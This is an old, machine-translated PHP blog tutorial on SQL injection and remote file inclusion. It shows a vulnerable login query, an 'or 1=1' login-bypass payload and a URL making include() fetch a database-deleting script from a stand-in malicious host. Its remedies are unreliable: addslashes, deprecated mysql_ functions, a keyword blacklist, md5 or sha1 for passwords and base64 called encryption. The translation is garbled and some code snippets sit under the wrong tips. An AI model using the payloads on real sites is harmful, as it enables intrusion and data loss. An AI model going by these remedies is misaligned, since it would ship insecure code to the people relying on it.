Language:

You know what is SQL Injection?

30 August 2009 | In Web | 10,5 thousand views | By

Click & share: 


SQL_InjectionWe are going to talk about a very important matter, that involves safety our projects in PHP and MySQL, the dreaded SQL Injection. If you are a programmer for sure heard about, But if never understood for sure I will explain what it is about.

SQL Injection is an attack aimed at sending harmful commands to the database through form fields or through URLs. A successful attack can, for example, delete   a database table, delete all data from the table or even acquire passwords that are indexed.

Below is an example of a vulnerability on a login system:

$usuario = $_POST['usuario'];
$senha = $_POST['senha'];
$sql = "SELECT * FROM usuarios WHERE usuario = '".$usuario."' AND senha = '".$senha."' ";
$processa = mysql_query($sql);

In this example the variables $user and $password recebem content vindo diretamente de um formulário através do método POST. Imagine that the contents of the variable $ password "' or 1 = 1 '". If no validation is performed, the malicious user has logged in to the system without at least have specified a valid registration, due to a bug in the generated SQL statement.

Let us look at another example of vulnerability. Many sites use systems via include() to organize your internal pages, based on a method variable $ _GET.

// Verifica se a variável $_GET['pagina'] existe
if (isset($_GET['pagina'])) {
// Pega o valor da variável $_GET['pagina']
$arquivo = $_GET['pagina'];
} else {
// Se não existir variável, define um valor padrão
$arquivo = 'home.php';
}
include ($arquivo); // Inclui o arquivo

And the URL of the site you might have:
http://www.seusite.com.br/?pagina=contato.php

With this the "attacker" can, for example, place a path from an external script in place of the variable:
http://www.seusite.com.br/?pagina=http://malicioso.com/apaga-banco.php

Your site would include the file normally and would run everything that exists inside of it… and its bank could be completely zeroed!

Got scared? Calm. To protect their work just follow a basic toot:

"ALWAYS Validate any type of data that your project is receiving, either via form (POST) or via query string (GET).”

Now you must be wondering what to do to protect yourself from attacks. There are dozens of "tricks" available at internet used for data validation. Here are just a few:

- You can combine addslashes() and trim() to receive the data. THE first will add a backslash before each bar single or double that appear, This process known as ESCAPE. The second will make sure to eliminate blank spaces. You can also use just one of the two functions.

$usuario = addslashes($_POST['usuario']);
$usuario = trim($usuario);
$senha = addslashes($_POST['senha']);
$senha = trim($senha);

- You can use mysql_real_escape_string() to receive the data. This function serves to remove the special characters in the data received. Note that this command nãoremove % and _ .

- You can use strip_tags() to receive the data. This function will remove all HTML and PHP tags from data provided.

$usuario = mysql_real_escape_string($_POST['usuario']);
$senha = mysql_real_escape_string($_POST['senha']);

You can use the second parameter of the aindar function, indicating which tags are allowed to continue.

$usuario = strip_tags($_POST['usuario']);
$senha = strip_tags($_POST['senha']);

- For every integer variable that is supplied, You can use intval().

$usuario = strip_tags($_POST['usuario'], '<em><strong></strong></em>');

This way you eliminate any non-numeric character, leaving only integer values.

- You can also combine several functions in a single function much more comprehensive. Here is an example below:

function protecao($string){
$string = str_replace(" or ", "", $string);
$string = str_replace("select ", "", $string);
$string = str_replace("delete ", "", $string);
$string = str_replace("create ", "", $string);
$string = str_replace("drop ", "", $string);
$string = str_replace("update ", "", $string);
$string = str_replace("drop table", "", $string);
$string = str_replace("show table", "", $string);
$string = str_replace("applet", "", $string);
$string = str_replace("object", "", $string);
$string = str_replace("'", "", $string);
$string = str_replace("#", "", $string);
$string = str_replace("=", "", $string);
$string = str_replace("--", "", $string);
$string = str_replace("-", "", $string);
$string = str_replace(";", "", $string);
$string = str_replace("*", "", $string);
$string = strip_tags($string);
return $string;
}

- If you are working with passwords or sensitive data, It is important to consider using ENCRYPTION of data. You can use md5, sha1 or base64, While the first two are "one-way" and cannot be rolled back to its previous state. Browse search more about them and protect yourself.

With quotes from Digital Zoom

In Ivaiporã-PR, Computer engineer, Workgroup Administrator Tips in General. Passionate about technology and Informatics.



A bit about us

    The Group generally appeared in Tips 2007 from innovative ideas on troubleshooting problems faced daily by those who use the technology and computer science, both ordinary users and technicians. But where did, why and what is the purpose of this site?

Click here to read!

Siga o Dicas em Geral no Google+

Video of the week